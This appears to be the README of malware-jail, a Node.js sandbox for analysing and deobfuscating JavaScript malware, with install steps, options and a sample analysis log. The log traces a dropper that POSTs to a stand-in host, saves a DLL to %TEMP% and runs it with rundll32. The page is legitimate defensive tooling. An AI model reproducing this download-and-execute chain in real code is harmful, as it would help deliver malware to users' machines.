malware-jail: Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction

CAPE

malware-jail

Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js

malware-jail is written for Node’s ‘vm’ sandbox. Currently implements WScript (Windows Scripting Host) context env/wscript.js, at least the part frequently used by malware. Internet browser context is partially implemented env/browser.js.

Runs on any operating system. Developed and tested on Linux, Node.js v6.6.0.

Installing

git clone https://github.com/HynekPetrak/malware-jail.git
cd malware-jail
npm install

Usage

bash@linux# node jailme.js -h -b list

7 May 20:54:52 - mailware-jail, a malware sandbox ver. 0.13
7 May 20:54:52 - ------------------------
7 May 20:54:52 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-c ./config.json] \
7 May 20:54:52 - [-o ofile] [-b id] \
7 May 20:54:52 - [-s odir] [--down] [malware1 [malware2] .. ]
7 May 20:54:52 - -c config .. use alternative config file, preceed with ./
7 May 20:54:52 - -e ifile ... js that simulates specific environment
7 May 20:54:52 - -o ofile ... name of the file where sandbox shall be dumped at the end
7 May 20:54:52 - -s odir ... output directory for generated files (malware payload)
7 May 20:54:52 - -b id ... browser type, use -b list for possible values
7 May 20:54:52 - -t msecs ... number of miliseconds before terminating execution, default 1 minute
7 May 20:54:52 - --trace ... print stack trace with every log line
7 May 20:54:52 - --down ... allow downloading malware payloads from remote servers
7 May 20:54:52 - --h404 ... on download return always HTTP/404
7 May 20:54:52 - malware ... js with the malware code
7 May 20:54:52 - If no arguments are specified the default values are taken from config.json
7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]

 

In the examples folder you may find a deactivated malware file. Run the analysis with:

node jailme.js -c ./config_wscript_only.json --down=y malware/example.js

Internet browser based malware you may test with

node jailme.js -b IE11_W10 malware/example_browser.js

At the end of the analysis the complete sandbox context is dumped into a ‘sandbox_dump_after.json’ file.

You may want to examine following entries of ‘sandbox_dump_after.json’:

  • eval_calls – array of all eval() calls arguments. Useful if eval() is used for deobfucation.
  • wscript_saved_files – content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too.
  • wscript_urls – all URLs that the malware intended to GET or POST.
  • wscript_objects – WScript or ActiveX objects created.

‘sandbox_dump_after.json’ uses JSONPath, implemented by JSON-js/cycle.js, to save duplicated or cyclic references to the same object.

bash@linux# node jailme.js malware/example.js

11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json

 

Copyright (c) 2016 Hynek Petrak

Source: https://github.com/HynekPetrak/